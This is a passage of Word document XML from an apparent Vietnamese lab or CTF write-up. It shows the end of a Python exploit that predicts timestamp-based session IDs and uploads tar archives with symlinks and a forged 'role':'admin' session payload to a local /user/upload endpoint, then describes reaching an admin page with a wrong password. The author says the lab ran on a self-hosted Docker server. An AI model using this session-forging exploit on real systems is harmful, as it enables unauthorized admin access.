          <w:p w14:paraId="1AD65B10" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                    return True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C702D9C" w14:textId="5DBB3E26" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"Upload failed: {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>response.status_code</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>} - {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>response.text</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6692875F" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                return False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E602F37" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B001371" w14:textId="4A504177" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"Upload error: {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>str(e)</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF6B44F" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            return False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F702806" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        finally:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBC2242" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            self.cleanup()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487AFAAB" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30EF50E8" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    def cleanup(self) -&gt; None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FFA580" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        if os.path.exists(self.archive_name):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557D1BCE" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            os.remove(self.archive_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BA094CA" w14:textId="451D174A" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Cleaned up archive"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A78D2E4" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="283F2F93" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>def predict_session_ids(offset_start=1, offset_end=60):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B10DD77" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    base_ts = int(time.time())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A6B13E" w14:textId="77777777" w:rsidR="006546FE" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    return [hashlib.sha256(str(base_ts + i).encode()).hexdigest() for i in range(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710CE782" w14:textId="01A441C5" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>offset_start, offset_end + 1)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171A58CB" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68CD333E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">if __name__ == </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"__main__"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2333C703" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    upload_url = </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"http://127.0.0.1:1337/user/upload"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146690BD" w14:textId="7FF722B1" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    payload = </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'{"username":"</w:t>
            </w:r>
            <w:r w:rsidR="00A04FD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>abcdef</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>","id":</w:t>
            </w:r>
            <w:r w:rsidR="00A04FD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>,"role":"admin"}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCB638C" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    session_ids = predict_session_ids()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB6D73D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="076C0FC9" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    for idx, session_id in enumerate(session_ids):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A65694" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        archive_name = </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"malicious_{</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>idx</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>:02d}.tar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23544D53" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        exploit = SymlinkArchiveExploit(session_id, payload, archive_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74272FA8" w14:textId="08133C11" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"\n [{</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>idx+1</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}/60] Trying session: {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>session_id</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E5C3D50" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        if exploit.create_malicious_archive():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A8F483" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            exploit.upload_archive(upload_url)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F987678" w14:textId="77777777" w:rsidR="006208D4" w:rsidRDefault="006208D4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26772B04" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:r w:rsidRPr="006127C4">
        <w:t>Script này có chức năng tạo ra các tệp nén định dạng .tar chứa symbolic link (symlink) nhằm giả mạo các tệp session với quyền truy cập "role": "admin". Cụ thể, script sẽ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA0F25" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006127C4">
        <w:t>Dự đoán 60 session ID tiềm năng dựa trên thời điểm thực thi (từ thời gian hiện tại cộng thêm 1 giây đến 60 giây).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E3DE5A" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006127C4">
        <w:t>Với mỗi session ID, script tạo một tệp .tar chứa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5E95B" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="006127C4">
        <w:t>Một symlink trỏ tới đường dẫn session thực tế trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1966068D" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="006127C4">
        <w:t>Một payload JSON giả mạo có nội dung "role": "admin".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16156D" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006127C4">
        <w:t>Sau khi tệp .tar được tạo, script sẽ gửi nó lên hệ thống thông qua endpoint /user/upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2248F0" w14:textId="5839446A" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="006127C4">
      <w:r>
        <w:t>Thực hiện chạy script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1974A86D" w14:textId="7E3EC4FE" w:rsidR="00DF506B" w:rsidRDefault="00E53F53" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53F53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4918365A" wp14:editId="1E08BF68">
            <wp:extent cx="5731510" cy="2645410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="78824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6425" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2645410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE7281" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CCD025" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B751E45" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5810BF68" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3094AA01" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1606B93A" w14:textId="77777777" w:rsidR="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6653B046" w14:textId="3009747B" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="006127C4">
        <w:lastRenderedPageBreak/>
        <w:t>Đăng nhập với username abcdef và password sai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD8BE0" w14:textId="2E5C155F" w:rsidR="00FF4CD6" w:rsidRDefault="00FF4CD6" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DACA585" wp14:editId="3C82203C">
            <wp:extent cx="5731510" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10792787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729" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B6DFD" w14:textId="34DB6395" w:rsidR="006127C4" w:rsidRPr="006127C4" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="006127C4">
        <w:t>Thành công truy cập vào trang admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F370C" w14:textId="7DA2D7E5" w:rsidR="00FF4CD6" w:rsidRDefault="00FF4CD6" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4CD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4163A0" wp14:editId="70B61916">
            <wp:extent cx="5731510" cy="3575685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="2051224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051" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3575685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FE32B" w14:textId="77777777" w:rsidR="006127C4" w:rsidRPr="00E56CF5" w:rsidRDefault="006127C4" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A68B608" w14:textId="3BDB33DB" w:rsidR="006127C4" w:rsidRPr="00E56CF5" w:rsidRDefault="006127C4" w:rsidP="00E56CF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56CF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lưu ý: Bài lab được thực hiện trên server do mình tự dựng trên docker nên sẽ ko chứa flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10515B30" w14:textId="2A11F976" w:rsidR="00DF506B" w:rsidRPr="00552A66" w:rsidRDefault="00DF506B" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2AAD8D" w14:textId="77777777" w:rsidR="00552A66" w:rsidRPr="00216F38" w:rsidRDefault="00552A66">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00552A66" w:rsidRPr="00216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FCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="822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A656EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93A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82B3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43BC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F7B0E"/>
    <w:multiLevelType w:val="multilevel"/>
